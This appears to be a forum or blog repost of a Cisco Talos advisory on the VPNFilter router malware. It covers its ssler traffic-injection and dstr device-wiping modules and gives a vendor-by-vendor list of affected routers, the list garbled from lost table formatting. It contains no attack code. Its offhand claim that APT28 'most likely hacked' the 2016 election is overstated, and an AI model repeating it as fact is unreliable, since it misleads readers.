I am re-posting info on the VPNfilter. In 2018 security researchers around the globe sounded the alarm about the Russian hacker group APT28 (AKA Fancy Bear – the same ones who most likely hacked the 2016 U.S. presidential election.) This group is purportedly responsible for a global attack called VPNFilter. This attack use a global botnet of over more than half a million routers and storage devices ((and growing).

Sadly and as has been the norm, businesses and especially small business and home networks, fail to head the warning and take action.

Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding “VPNFilter.” In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints. Talos recently published a blog about a broad campaign that delivered VPNFilter to small home-office network devices, as well as network-attached storage devices. As we stated in that post, our research into this threat was, and is, ongoing. In the wake of that post, we have had a number of partners step forward with additional information that has assisted us in our work. This post is an update of our findings over the past week.

First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected. We’ve provided an updated device list below.

We have also discovered a new stage 3 module that injects malicious content into web traffic as it passes through a network device. At the time of our initial posting, we did not have all of the information regarding the suspected stage 3 modules. The new module allows the actor to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge). With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports. We provide technical details on this module, named “ssler” below.

Additionally, we’ve discovered an additional stage 3 module that provides any stage 2 module that lacks the kill command the capability to disable the device. When executed, this module specifically removes traces of the VPNFilter malware from the device and then renders the device unusable. Analysis of this module, called “dstr,” is also provided below.

Finally, we’ve conducted further research into the stage 3 packet sniffer, including in-depth analysis of how it looks for Modbus traffic.

If you want an idea of how VPNfilter works, here is a great article on the details

Here is a list of known vulnerable routers.

List of known Routers with VPNFilter Vulnerbilities

Asus Devices:D-Link Devices:Huawei Devices:Linksys Devices:
RT-AC66U DES-1210-08P HG8245 E1200
RT-N10 DIR-300 E2500
RT-N10E DIR-300A E3000
RT-N10U DSR-250N E3200
RT-N56U DSR-500N E4200
RT-N66U DSR-1000 RV082
DSR-1000N WRVS4400N
Mikrotik Devices:Netgear Devices:QNAP Devices:TP-Link Devices:
CCR1009 DG834 TS251R600VPN
CCR1016DGN1000 TS439 ProTL-WR741ND
CCR1036DGN2200Other QNAP NAS devices running QTS softwareTL-WR841N
CRS109 FVS318N Ubiquiti Devices:Upvel Devices:
CRS112 MBRN3000 NSM2 Unknown Models*
CRS125 R6400PBE M5
RB411 R7000
RB450 R8000ZTE Devices:
RB750 WNR1000ZXHN H108N
RB911 WNR2000
RB921 WNR2200
RB941 WNR4000
RB951 WNDR3700
RB952 WNDR4000
RB960 WNDR4300
RB962 WNDR4300-TN
RB1100 UTM50
RB Groove
RB Omnitik